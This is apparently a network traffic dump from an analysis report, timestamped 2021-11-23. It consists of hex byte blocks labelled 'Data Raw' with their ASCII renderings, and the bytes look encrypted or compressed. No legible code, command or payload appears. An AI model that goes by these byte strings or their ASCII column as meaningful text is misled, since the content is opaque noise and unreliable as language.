                                                                                    2021-11-23 13:40:02 UTC116INData Raw: 81 cf ff 4e 3a 1b 42 be da 45 33 ea d7 d9 24 cc 33 89 1f 86 a9 0b b9 2e 8d dc cc 0e 2c cb 4f 62 24 8c da a7 03 c8 7d bd 3c c0 98 d8 27 70 10 32 cf 2b 8a 6c 48 88 98 d9 e1 31 3b b3 f7 35 20 9a 3f e2 8b 99 47 95 7f 6b 6e 00 60 8f be e7 08 ec 86 2c 04 d9 e3 e7 8f b6 51 51 b7 2f d7 0d e9 89 40 62 78 8c 3e 47 a9 bd cc 78 14 36 7b a2 a6 e4 1b 27 a7 40 f9 32 55 de c3 5f f6 af ca 7a 46 d0 ef 73 cb 24 1c 03 77 1d db a6 07 c9 d1 9e 22 68 42 33 7d 8a 3a 45 bb 91 ea 28 ae af d2 38 1a 0d 20 7e a2 cb cc 8e 10 0c eb 99 7c f3 cd 63 7b f4 66 9d 31 86 3d 44 62 e4 6a 06 f3 ed c9 aa 72 19 e1 0e ba 45 11 ef a5 33 14 41 3e bd 1d 49 6a 74 a5 15 04 3c c7 4e 2e a5 28 24 b6 45 31 4a b3 2d f6 47 16 ce c9 c2 23 d9 75 c4 16 34 7a 78 fe 41 55 16 d8 11 23 89 8c 11 38 ab 6b 47 b6 04 31
                                                                                    Data Ascii: N:BE3$3.,Ob$}<'p2+lH1;5 ?Gkn`,QQ/@bx>Gx6{'@2U_zFs$w"hB3}:E(8 ~|c{f1=DbjrE3A>Ijt<N.($E1J-G#u4zxAU#8kG1
                                                                                    2021-11-23 13:40:02 UTC118INData Raw: 11 74 8e ce 93 f4 82 89 f9 5e 3f 47 f9 98 68 0f 71 ca 96 a7 32 37 40 09 49 75 d4 0f 03 9c 07 db 30 28 5b 15 46 cf 76 21 5a af ca c8 61 40 0f 64 2c fa 93 ce 7a b7 ce bf f3 c3 f0 df ec 9c 82 eb 3c d2 41 01 3c b1 67 9c d1 78 d8 67 72 fb e6 19 f8 58 b0 b0 03 88 bc d5 f5 e6 2c bb a3 9d 2d ac 60 b4 c7 80 7f 11 0e ee 2f 19 ba da c8 59 d0 af bb 7b a1 eb b9 8e 27 34 84 3b bf ea 4a df 2d 66 52 73 8a 6a eb 9f e8 af fa e4 9a 94 f4 4a 4c ef 37 f6 84 3e 2b 33 e9 95 23 e0 32 8e dc 19 08 b7 e9 6a 02 07 8e 96 52 f0 08 19 4d eb c5 b1 b2 df 17 c1 80 0f 21 8f 64 0c 45 63 52 9d 0b d1 99 f1 ec b8 1c b0 bb d7 18 94 ae 43 4e b0 a1 0c 7d 41 3b 13 cf 4a 76 e9 16 23 51 36 86 92 5d c9 cb f3 10 43 e2 ad 37 c6 7e ad d1 01 0c ce 5f 3c 97 21 6a fc de 37 80 3b 5e be 00 a0 97 72 6a 4f 73
                                                                                    Data Ascii: t^?Ghq27@Iu0([Fv!Za@d,z<A<gxgrX,-`/Y{'4;J-fRsjJL7>+3#2jRM!dEcRCN}A;Jv#Q6]C7~_<!j7;^rjOs
                                                                                    2021-11-23 13:40:02 UTC119INData Raw: c2 37 9f 86 84 77 fb 34 1e bc 3d 34 7d a6 77 cb ff e6 42 51 c4 0a 3f c2 02 28 81 6a a3 8e 9b eb b5 88 02 38 a3 0b a0 20 f4 9e 0b 12 06 a6 cc a7 e0 7b 95 d3 7b f9 f5 24 ca df d5 05 ec 17 d9 ba c1 a8 2e 66 90 08 0e 43 fe 0c f6 75 65 2c 48 37 a7 47 06 18 2b b2 eb 42 58 bf 16 b7 6e 78 ac 2b 80 d9 5c bf 6c 66 af 47 83 f3 16 57 09 d9 a2 0b a8 22 3d ee 18 22 12 3c 38 15 46 da be cb f4 66 a7 27 3b 3d 46 af a0 b9 03 14 95 33 17 f5 cd c6 aa 7a b3 57 21 de cb e0 d7 1c 12 7d 90 71 a0 de 9f e1 04 32 5f f0 1b db b9 18 d7 7b 58 c0 da 82 e1 4b 35 1f 13 7c 5b 6d 6a b5 f3 28 bf 2d 03 55 a8 81 f8 09 13 49 d6 fd 35 09 47 85 85 bf 6a 7a 87 5a af 61 0a ef 9a f6 5e 0f 00 11 f9 e0 48 2d 0e 69 9a f4 60 88 64 7f 3a 0e e6 8b b9 1e 14 91 f3 4d 20 74 11 4b 00 51 97 93 74 46 ce 40 92
                                                                                    Data Ascii: 7w4=4}wBQ?(j8 {{$.fCue,H7G+BXnx+\lfGW"="<8Ff';=F3zW!}q2_{XK5|[mj(-UI5GjzZa^H-i`d:M tKQtF@
                                                                                    2021-11-23 13:40:02 UTC120INData Raw: c8 70 a3 d7 01 0d cc 4d be 76 24 6d fe dc 25 b5 38 58 ac 35 a6 b7 70 78 7a 7d 44 7a 81 82 c0 b5 02 a8 0d ee c7 bc 6c ea 98 84 15 d1 62 ca 88 7b b3 d5 5e ef 47 81 c8 df 4a 3b 15 4c b0 d4 24 32 ea e3 8a 5d bf 47 ec 72 a8 fe 6e db 00 de b9 be 78 45 a8 2a 11 0a dc a8 c8 77 a7 1e d2 50 b3 b6 8b 48 11 60 7a bb 5f fa 2f 24 e1 fd b7 95 61 49 dc 83 5a 43 f5 53 f0 c8 eb 22 f4 0b 0e 31 5f 29 e1 cd 93 69 82 e5 49 5b 86 f0 a3 e6 c5 21 3e c4 4a 88 52 a0 e7 33 16 19 e2 5d 22 f6 e2 cc 78 14 32 53 a2 b4 b9 1f 0f a7 52 98 31 7d de c1 56 f7 af ce 33 32 b5 82 73 cb 15 1d 03 65 21 bc c3 69 ac a3 ff 56 0d 26 13 10 ef 4e 2d d4 f5 d4 29 ae fb dc 3c 4e 74 50 1b b0 f7 ab eb 7e 69 99 f8 08 96 a9 43 16 91 12 f5 5e e2 03 6d 63 e4 4e 3e 95 8b ab c9 16 2e 85 23 db 24 70 d6 88 07 72 74
                                                                                    Data Ascii: pMv$m%8X5pxz}Dzlb{^GJ;L$2]GrnxE*wPH`z_/$aIZCS"1_)iI[!>JR3]"x2SR1}V32se!iV&N-)<NtP~iC^mcN>.#$prt
                                                                                    2021-11-23 13:40:02 UTC122INData Raw: 8c d2 9f 62 9c 5b 90 2a a9 39 11 de e8 b6 89 a1 39 c7 d2 04 40 d8 fe b2 75 53 78 02 1e 17 e8 e4 59 c6 5d 79 75 d0 a6 7b 74 a7 03 4d b4 cc dd 32 5d 51 5d 69 59 ff 9d 0f 45 48 d2 38 5b 97 cd a8 f5 7b 26 81 42 9c a7 e5 5a a2 ee 63 80 d7 62 dd 9d ba 7e 57 f4 48 88 40 78 24 ee 92 d9 2a 9a d8 4b fb 2c 52 13 3f f1 3e 93 ec ce ed fe e9 cd 21 61 a9 ad b5 40 8d 76 bf 37 0f 55 c6 38 3e bc cc 30 ae 97 0e 56 11 15 0b 02 1c 75 2a b4 ad ef ef eb 49 c7 7f 92 ed 18 6c a8 7e 75 76 9e fc 16 89 8e 14 16 95 c4 1d 5c c4 87 14 d8 b4 ca 83 cc d9 75 38 30 87 0f 48 31 2d b0 63 74 15 03 d3 60 3a 71 ab 3d 1e 4c 1b fc f2 f7 07 d7 af 4e 00 f7 06 9b fd 41 f9 e2 8d a6 f0 46 f6 d7 8a 37 c4 95 ef 84 9d eb a5 6f 6d ba e9 22 04 96 b5 0c 36 53 1f eb a2 9d 8d 70 be fd 83 7f a6 d2 a3 1a 5e 4e
                                                                                    Data Ascii: b[*99@uSxY]yu{tM2]Q]iYEH8[{&BZcb~WH@x$*K,R?>!a@v7U8>0Vu*Il~uv\u80H1-ct`:q=LNAF7om"6Sp^N
                                                                                    2021-11-23 13:40:02 UTC123INData Raw: 4d 48 3c 3e 26 20 40 b3 6e d5 d1 29 30 3f b5 8b f5 a1 c2 9c 39 24 a6 16 be 0b bb 0a 7a 68 77 0b b7 2a d9 e2 5d 25 3d f7 ab b8 9c 14 45 bb 7a 87 1e 7c 42 96 8f 43 f8 74 5d f1 5b 4d a8 fd eb fc 7a 1d 9d 10 95 fe fa bc 26 e8 04 e7 54 c5 90 69 c0 14 92 51 ed 32 91 6d 5c 9d 15 15 60 b7 9d b9 8c 1d cf 0d 73 c7 93 d2 22 06 76 4b 3f 3a fc 0b 68 c7 73 91 06 72 d9 5b 31 8a f0 3f 48 8e 63 4a 72 e0 56 01 8d 20 96 72 04 e8 81 36 37 ad 2f 54 67 11 34 c7 ce 7a cd 81 23 b3 80 41 2f d4 05 81 93 cb 0f 5d 9a 9b 9b 81 d1 52 79 6c af fc a6 c7 58 9b e1 ad b4 01 68 40 b5 7a a2 54 18 d9 90 dd 8b f5 f5 72 68 1e 2e da 4e 06 12 73 61 e6 86 36 a3 5c be c1 d6 05 25 a4 9d 99 98 99 83 94 09 03 77 7d da bb 90 f2 2b 7e 71 1b 42 e0 79 86 c6 75 80 5a 5f 93 c7 fd 96 31 9d 47 22 c6 71 7b bd
                                                                                    Data Ascii: MH<>& @n)0?9$zhw*]%=Ez|BCt][Mz&TiQ2m\`s"vK?:hsr[1?HcJrV r67/Tg4z#A/]RylXh@zTrh.Nsa6\%w}+~qByuZ_1G"q{
                                                                                    2021-11-23 13:40:02 UTC124INData Raw: 69 09 ee af 8a 35 8a 02 bf 89 b7 2f 29 a7 6f 25 9f 54 f6 bf 39 01 b1 c3 6a 49 ad 33 70 fa 57 44 01 81 10 45 49 9c ff 1a 97 56 72 8c f8 25 ba 5c e1 ed 0e e8 d2 8e 0e 16 c7 25 88 73 dd 15 06 75 f0 05 00 d9 9f ae fc f9 ef ec 35 50 c1 00 22 00 c5 a5 46 bf 35 3a a0 4f 54 db 20 dc 55 e8 3c f5 df 7e 8c 53 2d 91 c4 95 bb f1 a4 60 13 a0 8d 77 fb c6 44 b4 66 a1 04 15 91 8d bb a0 a1 03 b8 25 40 f5 e3 42 a6 91 ed 25 15 62 b4 ca 59 cd 35 6e fa 39 84 7f 2e 0d f9 60 ec d1 53 a1 89 fb 36 f5 59 91 76 dd 54 bf 8b 86 00 af 9e df cd 37 d0 c7 ff 8c 52 e8 ea 2e da bd b3 f5 6b 0a 50 8d 67 bc e1 3f 29 3a 2a db db cc 9e 66 b2 c4 66 c4 74 fc a1 98 e9 7b 82 11 ce 07 cb 7f 69 e2 d8 64 8a d8 54 de 3a d0 96 e4 c7 78 06 f5 c4 fb fc 10 bc 7e db 4c 6d 81 4f c9 cd 47 99 4a 68 37 e7 92 89
                                                                                    Data Ascii: i5/)o%T9jI3pWDEIVr%\%su5P"F5:OT U<~S-`wDf%@B%bY5n9.`S6YvT7R.kPg?):*fft{idT:x~LmOGJh7
                                                                                    2021-11-23 13:40:02 UTC125INData Raw: 97 8c 32 54 79 83 78 85 03 e9 3b 69 c4 cc e4 82 66 38 a2 02 a0 e8 58 9a 81 26 da 54 cd 15 0a dc dd 09 10 47 88 28 82 ae b0 74 07 66 67 80 97 9a c2 bd a7 b0 18 34 45 3b fd 13 c3 07 52 81 0f 37 e7 15 ce 9b 21 92 f2 27 f9 82 e2 07 36 42 d3 af cf 9d 2f f1 63 1c 5c 08 b2 c9 42 04 59 99 d9 34 3a 05 c6 cc 71 7c a6 eb d7 d7 91 d7 6d 54 c9 d1 70 63 10 92 96 c0 26 8e e0 36 6b 19 b6 2f 8e 53 0b d6 7d 11 34 b5 55 67 38 bb f6 ae 58 2c 8a 06 e1 8c 51 48 25 0e 8b f1 f5 30 b7 9d ac 32 03 c4 e8 a9 0c 44 fd 26 1f 4f 2d 11 bd b8 0d 81 cf f1 93 72 a3 35 b9 ed 4e 3b dd 16 50 50 5e 1d e7 1c d0 c6 1d c3 9c 9e 71 af 01 ca 8a 5a 3d a5 3c 7c 82 16 f0 36 94 1a 06 5c 57 d0 1b ba df ed 8d 4d fe 6a d8 97 d6 3b 96 cb 3b 80 47 7a cd 63 f9 8b 48 39 f9 19 fa 19 01 48 69 0e 39 c1 84 c1 2e
                                                                                    Data Ascii: 2Tyx;if8X&TG(tfg4E;R7!'6B/c\BY4:q|mTpc&6k/S}4Ug8X,QH%02D&O-r5N;PP^qZ=<|6\WMj;;GzcH9Hi9.
                                                                                    2021-11-23 13:40:02 UTC127INData Raw: b3 6a 9d 6e c4 5a 03 a0 50 b8 14 32 4e 02 16 7f 7d 7e 84 d7 e2 5a 76 2b 99 fa 45 d3 7c 95 83 d9 86 50 f2 5d b3 70 63 95 d7 66 94 7b 15 c2 c3 24 9c d1 d2 f9 8a d9 90 aa b1 0f b5 75 0a 4e 19 1b 9d 82 56 44 56 21 ce b2 17 29 74 18 1f 57 ef d9 7b cc ef 72 d1 e8 93 56 6a 56 49 23 e4 72 08 11 91 3b 15 ca 18 13 69 28 dc e6 c9 ee e2 28 b4 f8 4a 8b 6b 61 37 af 03 b6 f4 4e 67 8e 96 80 f8 fd 87 e6 46 13 a5 37 76 2c f2 ee 44 a1 37 66 aa 7b cd bc cb 29 e7 56 81 7b c0 25 af 01 5e 29 80 0f e1 03 97 95 86 57 21 b8 e2 ee 4f 39 1e 01 a8 8a 84 4b 30 87 b7 77 3a 6a 4e 25 3e 85 63 d2 27 f7 b3 3f 97 3c d2 c8 4a e1 21 ee de 08 a2 2b 11 3f d9 19 e0 32 65 c7 cd 88 34 b0 f8 99 95 c6 87 5a 90 a6 d8 cb b6 0b 20 25 f7 27 ec d3 0a 13 b8 94 e1 28 a1 b6 bb ab f5 f0 2f aa 96 90 90 d8 37
                                                                                    Data Ascii: jnZP2N}~Zv+E|P]pcf{$uNVDV!)tW{rVjVI#r;i((Jka7NgF7v,D7f{)V{%^)W!O9K0w:jN%>c'?<J!+?2e4Z %'(/7
                                                                                    2021-11-23 13:40:02 UTC128INData Raw: 96 38 31 84 83 ec 47 2f 9d 72 7b 0d 67 8b 6b ce e7 b4 e6 f6 8e d1 77 e0 c9 a8 dc c4 e6 65 96 98 14 02 dc cd f7 d8 b8 62 16 8e ac bc a8 92 2e a9 9a 78 73 8e 68 dd 8f 16 fa cf 44 1c f1 18 c2 29 42 87 d8 2c a6 17 cf dd 4e 35 60 9d 07 12 d6 a6 ce ac f7 60 65 42 8a 2a 88 81 78 e6 b6 a0 dc 91 8d 8e 3e 66 f0 f0 26 8d 45 8f 79 a8 f0 d2 f2 58 5b 23 e5 35 73 9f bf 73 06 9b f6 df 56 3a b2 f4 e2 1c 10 81 72 26 16 84 3c 08 64 13 9e 8b 95 2f 50 4f f1 09 cc 4b 1f 4f bf 2f ef e3 38 7d 28 c4 8c b4 93 84 2e 6c bd 67 cc b8 7c fc 7e fe cc 0e c7 ce 01 a6 d1 dd 9f 26 79 3b 09 83 bf 07 fd d5 29 84 c7 82 ea d7 26 7d ab 5f d9 83 47 5b 06 f2 90 a3 12 73 09 64 88 7f f6 5e 18 7f 84 ce dc f3 68 e7 25 30 9d fe 58 d0 5b 15 5e b4 aa 68 fc 87 f0 36 4a 1c ba 54 5a 97 16 6c 7b e2 b2 ec 0c
                                                                                    Data Ascii: 81G/r{gkweb.xshD)B,N5``eB*x>f&EyX[#5ssV:r&<d/POKO/8}(.lg|~&y;)&}_G[sd^h%0X[^h6JTZl{
                                                                                    2021-11-23 13:40:02 UTC129INData Raw: d7 3a 6e 28 46 f8 62 71 bc ac 29 0f 49 42 3e 4a 0d d7 07 e9 75 e0 92 21 30 1a 09 49 46 ff 2d 83 16 a0 f8 ef 6d 72 8b 43 2b e0 62 0e 4c 8b 29 42 a5 30 76 16 60 fe 5a 29 b4 aa 85 7a a2 8c 09 e9 06 c9 0a 78 e6 fb fa 02 d2 75 0b 02 d8 64 98 8f 80 13 33 e7 b8 11 95 57 a7 91 17 34 1a 97 e2 f3 0f 03 d6 58 1e 2f fd a8 12 b2 16 5b d9 49 1c b0 93 e1 af 83 de 56 e6 4d 1b 1f 70 2d 17 f3 29 e3 a1 17 e3 a1 8e 66 85 1a ba 4a dd e1 5a 16 84 36 80 64 24 ab 6d 0c 06 43 75 c6 2f 44 e8 fb c4 4a 6e 3b 37 74 f0 11 f3 9d a5 5f 63 50 5a a4 1a 92 54 a0 47 09 bb 6d fa ab c8 1e fa fd ca 39 88 29 38 63 b9 9d d9 01 51 8c 66 cf fb 42 ff dc 81 65 3e a0 e8 b4 6f 72 a3 4b cb f8 6e 5b b6 1b b0 02 8b ba 5a 7f e4 b5 be 9b 71 e2 27 7f 20 96 3f a0 44 09 02 2d 14 00 57 d9 a9 f0 52 e1 f0 11 e1
                                                                                    Data Ascii: :n(Fbq)IB>Ju!0IF-mrC+bL)B0v`Z)zxud3W4X/[IVMp-)fJZ6d$mCu/DJn;7t_cPZTGm9)8cQfBe>orKn[Zq' ?D-WR
                                                                                    2021-11-23 13:40:02 UTC130INData Raw: d3 ad 62 e0 b8 84 94 3e b5 f9 bd a9 ac 2a 58 aa e8 7a bc e6 42 c9 28 4a 32 de 48 60 c6 c2 31 13 27 bd 9e 6c 89 0a e8 83 6e 8f 4e 27 53 ee 87 a5 ba df ae 4b 28 11 7d ec 00 5b 89 ff 3d d2 d3 78 00 8e 57 70 6e ef 49 95 72 1c f2 0f 1b 78 dc f5 f2 95 68 ab 11 b5 4b 44 e2 5e aa c2 6f b0 aa 66 b8 a5 80 0a 52 18 c5 93 5b cf 77 56 7b 3c 30 a6 92 e0 be d6 19 04 2b 79 dc 13 71 e9 37 2f 49 a6 a7 65 26 00 9c 21 52 ee d3 be 81 36 2b ef 55 d1 b5 a3 cd 00 0f d5 86 be 8c 3a cf 60 61 6e f5 c2 59 ad d5 45 94 50 ee 3b ae 2d 99 2f d7 25 96 51 27 b2 c9 ca 62 08 da 91 6f db 4c 4a c6 8b 57 e3 88 87 1d 8f ff 8c 5b d0 02 2b da 7b d7 ff c6 5b 14 fc 93 cf 70 b4 f8 89 00 42 94 bb 63 6c 82 a6 4d 76 ca b4 0b 17 f7 7e 04 0a f5 7c 69 66 77 63 a5 41 d2 7a 4a 41 62 dd 59 3b 0d 1b 78 69 3e
                                                                                    Data Ascii: b>*XzB(J2H`1'lnN'SK(}[=xWpnIrxhKD^ofR[wV{<0+yq7/Ie&!R6+U:`anYEP;-/%Q'boLJW[+{[pBclMv~|ifwcAzJAbY;xi>
                                                                                    2021-11-23 13:40:02 UTC132INData Raw: ab e2 b4 8a 56 68 66 34 88 57 b4 b7 2e 66 cb 2a be de e2 1c ed 2f ed 6c 32 01 f3 c9 82 4a 03 c3 af 35 1b 35 b8 b3 74 e6 52 4d f6 a2 56 cf e7 82 8d 25 97 36 ba d3 89 92 c6 55 13 38 34 d6 74 e0 b7 c1 73 6e dc 90 35 e4 e2 c9 7a ca d3 41 65 55 d3 2b c6 7c 53 2c 98 ae 9a c2 5b de 6e 6e 25 56 f0 72 b2 3b 01 ab 41 5e e5 84 05 98 19 80 f3 db 7f 00 08 94 ae 2d b2 79 b2 2e c5 00 a3 71 21 cf e7 d8 da 41 32 2d 69 44 a2 44 5d a1 8d 1a da ce c8 5a df 08 20 94 ed d8 b9 7c 98 43 d9 80 28 37 0e 1e e3 5d 9a c3 88 6d 44 c4 d8 2d 29 22 08 3b a9 93 9b e5 8c 66 9a e7 cd 26 78 ce d4 ed 97 3e 6f e0 3f 31 a4 a1 d0 1b f6 41 f7 67 a8 5f 05 62 21 2b 54 a1 70 2d d6 68 aa a4 7e a8 0c 0c 88 de a3 24 26 17 64 99 2b 70 61 d9 e1 2e f4 5b 98 a1 97 44 56 8e 28 5d 57 a5 58 72 ea 40 e4 d0 68
                                                                                    Data Ascii: Vhf4W.f*/l2J55tRMV%6U84tsn5zAeU+|S,[nn%Vr;A^-y.q!A2-iDD]Z |C(7]mD-)";f&x>o?1Ag_b!+Tp-h~$&d+pa.[DV(]WXr@h
                                                                                    2021-11-23 13:40:02 UTC133INData Raw: 6a 73 cd ee 7d 47 44 aa 12 15 df 25 9e 86 b0 8b e1 2b 01 9f 03 41 2b fe c0 1f d7 d7 c4 49 0e 58 c5 8f d0 18 bd 59 b2 49 43 4f 50 c6 f9 96 4c de 4f 59 ed 5f 8a a2 1f 53 6e be fc 94 a0 40 71 70 cc c4 c5 64 b7 c5 56 09 15 28 b3 b1 39 f4 39 2c fb a9 09 e5 7b ad 23 3d b3 61 e6 61 2e 60 13 03 96 30 49 3a 1a 42 7f 89 9a ea 08 01 6b 35 e4 18 e5 83 be a5 7e df 8e 78 13 53 7d 72 24 ad 0a c7 6a e7 3d a6 65 7e d0 ef bf 79 b8 a7 ff 57 39 1d ac 4d 31 09 35 3e 96 82 7b f2 e8 11 65 ca 83 ec 34 36 bd b0 83 13 76 e9 24 47 fe 60 0d ba 86 29 ca 9c 34 5e 4f 1d d2 11 d9 65 6a 29 74 1e a7 58 dc f9 05 09 27 4d fe c8 61 cf 74 4d 2d 48 84 c7 e9 8f 2a 5e 92 ac 15 b7 69 b7 a1 b0 f5 d4 af 97 f9 97 2d d9 a9 ed cb be 05 c3 1e 6a 03 71 b7 e1 1f 85 a8 f4 be 8d 17 61 da 8d 50 90 a3 ff d0
                                                                                    Data Ascii: js}GD%+A+IXYICOPLOY_Sn@qpdV(99,{#=aa.`0I:Bk5~xS}r$j=e~yW9M15>{e46v$G`)4^Oej)tX'MatM-H*^i-jqaP
                                                                                    2021-11-23 13:40:02 UTC134INData Raw: f3 a8 c4 c1 7f 77 3d 28 f1 5d 43 33 91 a9 4a c9 f3 50 94 b7 3c eb b0 d1 1b 4b bc 23 11 26 35 26 d5 40 d2 5d 5e 5e 05 73 8f 45 55 eb 41 5c d5 62 de 73 8c 24 ce 2b f1 bc 4b a4 ee ed 4c 46 dc 4c 19 72 e4 74 ff 10 ac f2 73 7e d3 8e 5d 03 3a 50 f4 ec a7 9b 27 34 f0 68 df 17 d2 ab 5f 8e 2e a0 d6 51 06 db dc cb fb cd 43 24 aa fe 6c f8 74 f8 50 52 ca d1 4d e2 e9 e1 65 af c6 7c f1 cb d2 eb 13 d0 ec 27 2c b1 1d e5 8a 62 14 d3 70 d4 0c d7 eb b1 df f1 36 01 65 45 31 12 7f 46 25 27 20 a6 f5 04 ec 69 1b 9c 30 9e 91 2f 41 6f 71 19 63 56 d5 25 8b 72 4f 2f ef df 19 3c 65 1b 55 35 34 ef 47 39 56 20 74 cb 0c 0a cd af ab 42 32 a3 7e dc 1e 04 0a b5 ac 80 8e 64 b3 cb 69 8f 94 6b 97 ae 85 6b 61 14 b1 56 4f 79 94 17 41 74 a9 00 3e 67 d2 57 65 05 c5 fe fa 60 79 f1 21 98 4c 5e 55
                                                                                    Data Ascii: w=(]C3JP<K#&5&@]^^sEUA\bs$+KLFLrts~]:P'4h_.QC$ltPRMe|',bp6eE1F%' i0/AoqcV%rO/<eU54G9V tB2~dikkaVOyAt>gWe`y!L^U
                                                                                    2021-11-23 13:40:02 UTC136INData Raw: 19 ec d6 cf dc 98 a5 9f eb c9 07 a2 bb 35 fc f5 1e 4e cc 5e 3c dc 13 c3 f8 03 fc 91 32 77 90 b8 24 73 05 b5 c7 7e 41 2b 0e db c5 39 1b cc 54 7c fe 8b 25 6c c6 05 fc 42 39 39 d6 ec 0f 22 fa bb df 78 ec c5 97 3c 7e c9 84 6e 09 e9 44 57 5e b6 17 63 1d 5f 51 87 44 c5 9f 86 31 b6 64 53 85 64 fe 0c b6 76 53 44 11 56 94 af 7f ef 4b 70 32 7e cb c6 a3 f8 a8 a5 1d a4 b3 03 cb 16 14 0c f0 12 ea 95 21 50 2d 94 6b 92 fa 22 62 df af 62 90 16 72 f4 58 64 9a 46 fc 3b 21 a4 f2 ec ce f6 f1 5f 36 f8 9a b4 5f b1 0d c1 0f 0b ea 7c da de 71 5a de 26 49 14 8d 59 35 b4 4f 96 b1 90 d1 3e 2c ef e5 2b 41 b3 a9 42 b3 e1 46 50 69 67 01 a3 32 f7 d0 5f 15 70 c2 d1 85 20 ef 00 9b 20 13 3c 89 dc 3b 13 db 53 a9 d3 e7 71 52 5d 1b 92 32 96 d9 57 a9 9b 0d b3 c1 69 74 d5 5c 76 05 4a 30 bd bd
                                                                                    Data Ascii: 5N^<2w$s~A+9T|%lB99"x<~nDW^c_QD1dSdvSDVKp2~!P-k"bbrXdF;!_6_|qZ&IY5O>,+ABFPig2_p <;SqR]2Wit\vJ0
                                                                                    2021-11-23 13:40:02 UTC137INData Raw: cd be a2 67 a9 15 34 63 46 c6 e8 0f 96 2a db d7 60 93 c4 31 c1 64 45 2c ea f5 c0 90 28 d0 e7 5d b1 e5 6c e1 0f e4 66 02 d4 91 2c 28 ee 41 32 9d 6f 63 69 f5 cd d0 55 df 2a 6e f5 5f d6 79 d5 cc 7e 28 0a d4 37 d3 00 83 50 9f bb 3d 81 0b ee 65 d8 72 1c bb b6 33 7a 30 c2 2f b1 3b 15 55 c8 1a 88 41 6f 8d bc 2d 60 d2 5a 27 0d 5f 82 b0 c0 76 b3 f4 1f 8f 1a 8b e8 81 01 da e9 6e 08 03 b0 99 ac bf be f2 30 a4 75 28 9d fd cb f4 3f d7 8e 9c bd 57 f4 9e 48 eb 90 fd ca c2 0e 0b 82 b0 9c ae 41 c3 86 00 88 98 63 67 cc 83 8c b9 46 48 b4 fa fb e4 0f 94 f6 1c 94 36 55 cc 1d 00 62 75 29 73 7e 8b 8e 80 d0 41 77 59 e6 42 56 b8 15 d8 74 ba 1b f6 3b b0 1c 21 7b 31 c3 0e 14 27 48 1f c6 a2 b2 28 e4 1b a6 a9 f3 0d 51 92 a5 08 a6 a9 32 b6 7e fb 4f 57 d4 1b 7f 1c d8 a8 65 a8 eb 10 d3
                                                                                    Data Ascii: g4cF*`1dE,(]lf,(A2ociU*n_y~(7P=er3z0/;UAo-`Z'_vn0u(?WHAcgFH6Ubu)s~AwYBVt;!{1'H(Q2~OWe
                                                                                    2021-11-23 13:40:02 UTC138INData Raw: 59 cc 56 11 0d 9a 03 45 c5 85 46 e8 da 79 2d b4 13 e3 34 84 1b 69 1c 66 9b d2 2f 67 aa fe 24 55 e6 f3 bc f3 51 0c 0d 73 2b 8a 96 5b f8 51 17 70 e9 5a 06 aa 8a 7d c0 81 d9 37 e2 ee b0 b2 df 41 17 78 44 62 a3 13 1b 80 cc 98 cf d4 2f 58 e6 07 93 16 fe 17 8f ac e9 93 f9 06 dd 6c 3c 40 55 90 3a 68 f5 b7 cf 5d 19 ff 53 04 55 dc 51 5f 61 ec 04 69 6f 34 25 4e a4 03 ad 9f 04 bb f7 0c 9a 10 23 5e c9 c4 b7 66 db 65 4e 2d dd d4 02 5d 0c f9 88 9f 32 d4 70 d8 74 b6 00 9d af d0 5a ae 86 a2 77 84 92 a5 56 2e e8 be 81 c3 72 e3 c5 5f 84 7d ad 60 bc 2e c9 39 33 d8 18 0a ae a6 b6 3c bd 28 88 98 3f b9 55 60 fc 26 da ed 60 44 dc 26 e9 e3 3d 96 6a cf f1 97 fb e3 2f d2 77 54 4c 5f 2f 78 f0 19 d5 65 f1 a4 b8 73 04 a6 96 63 54 e8 09 f4 47 cc b2 19 c2 77 74 22 f9 d9 93 13 65 55 bb
                                                                                    Data Ascii: YVEFy-4if/g$UQs+[QpZ}7AxDb/Xl<@U:h]SUQ_aio4%N#^feN-]2ptZwV.r_}`.93<(?U`&`D&=j/wTL_/xescTGwt"eU
                                                                                    2021-11-23 13:40:02 UTC139INData Raw: f3 19 b5 8e f8 a3 c7 ff 0d 04 65 2c 19 be 8d f4 eb 3e d3 76 07 35 af 25 ae 63 27 00 c4 08 13 81 6e 30 55 7f 8d ec 79 ad 62 2f f3 91 96 9e 2c f3 5a 74 7f f5 d0 74 d8 a9 14 8c e8 67 e1 e2 79 4d c3 30 66 3b 2f 34 23 12 de 31 a7 03 84 39 4e 6a 6a fc 35 57 2c 95 96 b0 6f 44 75 f2 4e 10 6f 59 d2 f9 16 14 46 06 ad 07 0b 53 2c f1 24 8a 8c 77 1a aa 75 4f 87 db a4 04 8c 42 b8 4d ef 3f 9e d4 f6 fc 5d c3 52 27 2b 44 86 58 83 77 a1 4e b6 8d 8f 00 53 df 9e 81 d4 b7 1c ba dc d0 df 29 a4 5c 0b d9 17 24 25 c8 fa 69 fe 72 05 d6 5d 52 a2 9f c0 2a c4 6f 70 58 fd 6a a6 58 65 39 51 d4 49 2a e5 40 b2 47 2e ec b6 11 b3 ea 9f ab 22 58 72 bc fe 19 18 83 30 2d 48 22 81 c7 4d 64 e7 df 13 e2 bc 07 f5 29 60 8a 63 3e b9 39 ed 49 ed ec 59 6d ad ae 86 3f 7f 88 0f 8c bc e9 00 c6 5e 7d 03
                                                                                    Data Ascii: e,>v5%c'n0Uyb/,ZttgyM0f;/4#19Njj5W,oDuNoYFS,$wuOBM?]R'+DXwNS)\$%ir]R*opXjXe9QI*@G."Xr0-H"Md)`c>9IYm?^}
                                                                                    2021-11-23 13:40:02 UTC141INData Raw: 60 06 c4 ab c7 c1 2a 50 43 be 72 ed 79 77 a8 27 62 9e 5d 6d ef 93 bb 72 2a 89 84 1d d3 25 92 76 b0 30 43 de ee 78 dc ce 09 f8 a2 69 17 01 7a 65 82 d3 bf c0 0f d2 25 39 cd ec 29 0e fd ef a7 72 b5 e0 66 1c 30 ea 28 43 8d 74 d2 fd 8a 10 f4 2f ec 1b 3f da c1 de 6e 0b aa 6f f7 da c1 2f 74 6d ce d6 a3 5b bd dc 65 6f de e5 8e 8b 0b d8 44 73 cd 3a 4a 40 7d b6 8c 43 94 90 5e 84 9b 8c 93 35 fd e5 4c 4c 06 61 26 cf 93 52 a5 6d f5 6b e9 da 52 6a ab 45 b7 92 50 a8 10 a6 dd ea e7 e5 4c ec a2 b5 6d b4 4d 35 71 fc 4b d2 ac f0 ea 96 f8 a1 80 7e c5 5f 0c 80 22 87 49 a4 a4 73 c5 4a 10 63 44 f3 28 42 5f c9 6a 26 9d ee 06 86 96 5f 2f 87 b4 23 38 2c dc 85 ee 71 2c f0 80 80 24 42 2e 83 0a 9a 37 69 29 df dd eb fe 3d 03 98 91 80 a2 11 fa 52 19 b5 56 7c a3 ba d8 67 